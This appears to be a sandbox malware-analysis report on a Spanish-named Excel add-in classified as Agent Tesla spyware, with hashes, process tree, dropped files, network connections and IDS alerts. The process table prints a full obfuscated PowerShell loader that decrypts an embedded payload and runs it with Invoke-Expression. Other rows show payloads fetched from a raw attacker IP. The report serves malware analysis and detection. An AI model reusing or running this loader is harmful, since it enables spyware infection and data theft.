Field | Value |
---|---|
File name | Orden de compra.xlam |
Full analysis | https://app.any.run/tasks/15c07060-2d6d-4d98-9e37-d61de5b7cd66 |
Verdict | Malicious activity |
Threats | Agent Tesla is spyware that collects information about the actions of its victims by recording keystrokes and user interactions. It is falsely marketed as legitimate software on the dedicated website where this malware is sold. |
Analysis date | July 25, 2024, 19:49:58 |
OS | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
MIME | application/vnd.openxmlformats-officedocument.spreadsheetml.sheet |
File info | Microsoft Excel 2007+ |
MD5 | 4590B84EFCAC4A9804D570F575246E27 |
SHA1 | 82C7EBAA6F3D4E09C2BF6C2414E3664B90BB0E35 |
SHA256 | 5C40CEEF86F84DAFD5702A066833B86C7A0067B20C8DADDFF80FF5E1018BA033 |
SSDEEP | 24576:ROhpoPmytX56Nlk+YYdnND39BLC0oHW+uv/kTFYGMhwvFLpKrIlN:kpoPmytX5Mk+YYdnND39BLC0oHW+uv/k |


Extension | File type identification (score) |
---|---|
.xlsx | Excel Microsoft Office Open XML Format document (61.2) |
.zip | Open Packaging Conventions container (31.5) |
.zip | ZIP compressed archive (7.2) |


Document property | Value |
---|---|
AppVersion | 16.03 |
HyperlinksChanged | No |
SharedDoc | No |
LinksUpToDate | No |
Company | - |
TitlesOfParts | Sheet1 |
HeadingPairs | |
ScaleCrop | No |
DocSecurity | None |
Application | Microsoft Excel |
ModifyDate | 2023:08:03 11:37:28Z |
CreateDate | 2023:08:03 11:34:29Z |
LastModifiedBy | USER |
Creator | USER |

ZIP entry property | Value |
---|---|
ZipFileName | [Content_Types].xml |
ZipUncompressedSize | 1341 |
ZipCompressedSize | 395 |
ZipCRC | 0x0356e658 |
ZipModifyDate | 2024:07:25 16:21:16 |
ZipCompression | Deflated |
ZipBitFlag | 0x0002 |
ZipRequiredVersion | 20 |


PID | Command line | Path | Indicators | Parent process | Process details |
---|---|---|---|---|---|
3856 | "C:\Windows\System32\taskmgr.exe" | C:\Windows\System32\taskmgr.exe | — | explorer.exe | User: admin; Company: Microsoft Corporation; Integrity level: MEDIUM; Description: Windows Task Manager; Exit code: 1073807364; Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
3088 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | explorer.exe | User: admin; Company: Microsoft Corporation; Integrity level: MEDIUM; Description: Microsoft Excel; Exit code: 0; Version: 14.0.6024.1000 |
2496 | "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding | C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE | | svchost.exe | User: admin; Company: Design Science, Inc.; Integrity level: MEDIUM; Description: Microsoft Equation Editor; Exit code: 0; Version: 00110900 |
3512 | "C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Roaming\herewgoagain..vbs" | C:\Windows\System32\wscript.exe | — | EQNEDT32.EXE | User: admin; Company: Microsoft Corporation; Integrity level: MEDIUM; Description: Microsoft ® Windows Based Script Host; Exit code: 1; Version: 5.8.7600.16385 |
3540 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI87033969203593984906393361840877CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = 
'+'CnItDVfHzjTfNv7NHCZik3Du+9coR1FCmrHXH+Jjcg1QMvDCxEjHIV0kExEkV8UsWGyNxenYzZjkOwD4n5fkr1MLOQsoZE3GSH5j8lwTHd3NGG/Qd4VC9X5LjNYMDwENpm83Rs107dhDciePWSZ3h2kRFXD66mlAPNaxsgdTjos892SSfE+hX/RF7AGEKiCee1nzMKBpITFuh6fmuq6J7Nno4vBWienzjFeTjQKEucPEGdha9yYQa1NXwEsbYs1smiZBT01RbopMHSkOo1r1MUWLiCn1W42cFBaDukZKUs3/Fjdv9PISaWEdcvCSd8xx0weKY/6pc5wuFjQCAwe7Gu26juXgEdTd77O0i/u9AMwBDfj5PAocdI2Miw2RNgwHAsNjB4nijKk1Z+zWBSlGRNasCONCcABUdGvRa6xggUvGxRDtfWUy/a4TjozlLiI0cJ0vHYyq9p2dN+OlDFSrymB+1kNye/umYbl+4hWrlWTXIAPW49OktkAPpHwlIU5ihQMEJvGj8OrsEQ5EzNnjkusuQmMS0dSdXnwpZA1M/2aERpF76yNgJNx0ZH7NdFfc7QOa+rU0/9ie2zLf7XrTuqJAT5FsUPDgickumkmgfCl0SwGFzsaknbTy/0KTnt72wDrRwAUC+Bntx7Kj+PmRNezbnlMVsVIBq8xkhMCPIQqCZFsljefjVsEuLMLHbqCT/7X/G9MoWw21znqJlFh3SyluMI5swlqjacVr86YPKSaGvKmzaR4UcoV1+/8v9k36YlfzyLRzJFSYdbXzcFF4mf6EKH4FQA5j4Bb+c/IxiaUxXUot8STnKpnvCy9smdWg5/IrPO2UmI1LR7FQBcU+n0Svn8b7+LmIo5c1/7YMlxbkreLwPNzvXz2UAtxhMGbppZ6kg5szkmvZ3FzJJHh9EYyp3z5P1r/N6MuMgPVQHc2DsS8FzrNORkG/2TMgkQ5GNvMzkUTyXwgFCPkVpH9A+v2MLca8d4Q9IQes/TC9VfFb5j4YBKe+Fl+9cANlHiKL2OyW4p24X47Ym48XeQaJ0hKMHY416MKcqZVKkMFkel9V/Uj+2asXyB/mxpqqO8RyTNqAPHdj50SLvHjX85gAvdsv2S3gWKbiB+7KgZ4Of4EbO2MhKSKpl4e5h45KK0broLnKF6LeDfT1tPKOcTp7LirtikUY6x9b9pDxVjqkpml4YcwoXGGZzPbFnRVdT9HVxSEhyyh9ZR6gclI6kVCpPvBXzeEpXPxvfaLZ/0yDUMb+wSnAEiW2oZYJgSQXQX54SwVLcvqU+AM+wGayCOQQKYGokMCVRXLqLO0yTNIlJ9yttfNs6JtoeP134ga42TuRrz85Rb3vZJZTG7pO4cjJ1hRF1XaogAOgAwSvk7YCMPB5PNVlduX4qH0tOy2RyW+lahypGBn0k+d9WxFz0I8OJyQCzckyZpxLyqPiN9KsrpQ/6JNQ4HHd45JqasgXc+iE5vxiS0ZhKONRzL1maVcEsksIStiUgTWZkbNhpkvwvDkWoqayEbgyXsFXCimruMYcLwijsZNEfqnRpeyvQCXNQ7tI1ppqz8zD2DVlkrYMq964gqvCkVmjkyoRohSnYMXAwbbezPMAlBLKBW2Vvp5J+CB/+9sCHYrFNBDbWc1Fa4JEkpb1l+I5icGuF9lzRPh4Wmd8OOro3SvKcqxH3LwAjs42jGcczEhJjVavUx7cRmWvDwLjSlzx26nN+t7ZXaIgFKRstFxgCYpEnZRBo8Ceji6E6rBgqjt9XKw9mnSo6eV7ImgxCM1gXyTvYhEWMJ3XQ8JSvSwyoK2Ui3UVhSMM/GKPw==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: 
TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion') -CREplacE 'e4j',[Char]39 -CREplacE([Char]65+[Char]81+[Char]77),[Char]124)|&( $verbosEPREFerEncE.tosTriNg()[1,3]+'x'-join'') | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wscript.exe | ||||||||||||
3540 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (obfuscated script, shown in full above) | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | | wscript.exe | User: admin; Company: Microsoft Corporation; Integrity level: MEDIUM; Description: Windows PowerShell; Exit code: 0; Version: 10.0.14409.1005 (rs1_srvoob.161208-1155) |
2276 | "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | | powershell.exe | User: admin; Company: Microsoft Corporation; Integrity level: MEDIUM; Description: AddInProcess.exe; Exit code: 1073807364; Version: 4.8.3761.0 built by: NET48REL1 |
1388 | C:\Windows\System32\ctfmon.exe | C:\Windows\System32\ctfmon.exe | — | taskeng.exe | User: admin; Company: Microsoft Corporation; Integrity level: MEDIUM; Description: CTF Loader; Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
1524 | C:\Windows\system32\sipnotify.exe -LogonOrUnlock | C:\Windows\System32\sipnotify.exe | | taskeng.exe | User: admin; Company: Microsoft Corporation; Integrity level: MEDIUM; Description: sipnotify; Exit code: 0; Version: 6.1.7602.20480 (win7sp1_ldr_escrow.191010-1716) |
2060 | "C:\Program Files\Common Files\microsoft shared\IME14\SHARED\IMEKLMG.EXE" /SetPreload /JPN /Log | C:\Program Files\Common Files\microsoft shared\IME14\SHARED\IMEKLMG.EXE | — | explorer.exe | User: admin; Company: Microsoft Corporation; Integrity level: MEDIUM; Description: Microsoft Office IME 2010; Exit code: 1; Version: 14.0.4734.1000 |
2068 | "C:\Program Files\Common Files\microsoft shared\IME14\SHARED\IMEKLMG.EXE" /SetPreload /KOR /Log | C:\Program Files\Common Files\microsoft shared\IME14\SHARED\IMEKLMG.EXE | — | explorer.exe | User: admin; Company: Microsoft Corporation; Integrity level: MEDIUM; Description: Microsoft Office IME 2010; Exit code: 1; Version: 14.0.4734.1000 |


PID | Process | Key | Operation | Name | Value |
---|---|---|---|---|---|
3088 | EXCEL.EXE | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems | write | jh1 | 6A683100100C0000010000000000000000000000 |
3088 | EXCEL.EXE | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages | write | 1033 | Off |
3088 | EXCEL.EXE | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages | write | 1041 | Off |
3088 | EXCEL.EXE | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages | write | 1046 | Off |
3088 | EXCEL.EXE | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages | write | 1036 | Off |
3088 | EXCEL.EXE | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages | write | 1031 | Off |
3088 | EXCEL.EXE | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages | write | 1040 | Off |
3088 | EXCEL.EXE | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages | write | 1049 | Off |
3088 | EXCEL.EXE | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages | write | 3082 | Off |
3088 | EXCEL.EXE | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages | write | 1042 | Off |


PID | Process | Filename | Type | MD5 | SHA256 |
---|---|---|---|---|---|
3088 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVRC04A.tmp.cvr | — | — | — |
3088 | EXCEL.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\Orden de compra.xlam.LNK | binary | 563BDF6CC7DF90471E8C9FA6D671CB8E | B73CD8FFE649F0F01EAF4354E6A38C0180F476F413552C3AC867EDC9726C0DCB |
2496 | EQNEDT32.EXE | C:\Users\admin\AppData\Roaming\herewgoagain..vbs | text | C930F9919D538D29300810720CAA8B3F | 09D786230948EBF09ABB8461040A94387AE3F8F4639F86C33DE1F602089897E1 |
1524 | sipnotify.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\SipNotify\eoscontent\main.jpg | image | B342ACE63F77961249A084C61EABC884 | E5067BBA2095B5DA7C3171EC116E9A92337E24E471339B0860A160076EFE49B9 |
3540 | powershell.exe | C:\Users\admin\AppData\Local\Temp\yus0vk3d.ofl.ps1 | binary | C4CA4238A0B923820DCC509A6F75849B | 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B |
1524 | sipnotify.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\SipNotify\eoscontent\en-us.html | html | 9752942B57692148B9F614CF4C119A36 | E31B834DD53FA6815F396FC09C726636ABF98F3367F0CF1590EF5EB3801C75D1 |
2496 | EQNEDT32.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\B6QGX7LP\herewgoagain[1].vbs | text | C930F9919D538D29300810720CAA8B3F | 09D786230948EBF09ABB8461040A94387AE3F8F4639F86C33DE1F602089897E1 |
1524 | sipnotify.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\SipNotify\eoscontent\metadata.json | binary | E8A970BA6CE386EED9A5E724F26212A6 | 7E06107D585D8FC7870998F3856DCC3E35800AA97E4406AAB83BC8444B6CBDE3 |
3088 | EXCEL.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat | ini | 61AB622B6636924580C8CDC7E5F85788 | 194FB3ADF800C024EBD627850D9FEC545E2C68B6CA5F6C632BF526AEC668C3EB |
3540 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | dbf | 446DD1CF97EABA21CF14D03AEBC79F27 | A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF |

PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
1372 | svchost.exe | GET | 304 | 23.36.76.104:80 | http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?33775f6043c93e33 | unknown | — | — | unknown |
1372 | svchost.exe | GET | 200 | 23.36.76.146:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | — | — | unknown |
1372 | svchost.exe | GET | 200 | 96.6.16.217:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | — | — | unknown |
1060 | svchost.exe | GET | 304 | 23.36.76.104:80 | http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?8f69642324cc87bd | unknown | — | — | unknown |
2276 | AddInProcess32.exe | GET | 200 | 208.95.112.1:80 | http://ip-api.com/line/?fields=hosting | unknown | — | — | unknown |
2496 | EQNEDT32.EXE | GET | 200 | 107.175.229.144:80 | http://107.175.229.144/herewgoagain.vbs | unknown | — | — | unknown |
3540 | powershell.exe | GET | 200 | 107.175.229.144:80 | http://107.175.229.144/mybase64rdpdpdpd.txt | unknown | — | — | unknown |
1524 | sipnotify.exe | HEAD | 200 | 104.110.23.132:80 | http://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE2JgkA?v=133664144014210000 | unknown | — | — | unknown |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
4 | System | 192.168.100.255:137 | — | — | — | whitelisted |
— | — | 224.0.0.252:5355 | — | — | — | whitelisted |
4 | System | 192.168.100.255:138 | — | — | — | whitelisted |
1372 | svchost.exe | 4.231.128.59:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
1060 | svchost.exe | 224.0.0.252:5355 | — | — | — | whitelisted |
2496 | EQNEDT32.EXE | 107.175.229.144:80 | — | AS-COLOCROSSING | US | unknown |
1372 | svchost.exe | 23.36.76.104:80 | ctldl.windowsupdate.com | Akamai International B.V. | NO | unknown |
1372 | svchost.exe | 23.36.76.146:80 | crl.microsoft.com | Akamai International B.V. | NO | unknown |
1372 | svchost.exe | 96.6.16.217:80 | www.microsoft.com | AKAMAI-AS | NO | unknown |
3540 | powershell.exe | 207.241.232.195:443 | ia803405.us.archive.org | INTERNET-ARCHIVE | US | unknown |

Domain | Reputation |
---|---|
google.com | whitelisted |
settings-win.data.microsoft.com | whitelisted |
ctldl.windowsupdate.com | whitelisted |
crl.microsoft.com | whitelisted |
www.microsoft.com | whitelisted |
ia803405.us.archive.org | unknown |
ip-api.com | shared |
ftp.horeca-bucuresti.ro | malicious |
query.prod.cms.rt.microsoft.com | whitelisted |

PID | Process | Class | Message |
---|---|---|---|
2496 | EQNEDT32.EXE | Potentially Bad Traffic | ET INFO Dotted Quad Host VBS Request |
3540 | powershell.exe | Exploit Kit Activity Detected | ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 3 M1 |
1060 | svchost.exe | Device Retrieving External IP Address Detected | INFO [ANY.RUN] External IP Check (ip-api .com) |
1060 | svchost.exe | Device Retrieving External IP Address Detected | ET INFO External IP Lookup Domain in DNS Lookup (ip-api .com) |
2276 | AddInProcess32.exe | Device Retrieving External IP Address Detected | POLICY [ANY.RUN] External Hosting Lookup by ip-api |
2276 | AddInProcess32.exe | Device Retrieving External IP Address Detected | ET POLICY External IP Lookup ip-api.com |
3540 | powershell.exe | Potentially Bad Traffic | PAYLOAD [ANY.RUN] Reverse Base64 Encoded EXE Inbound |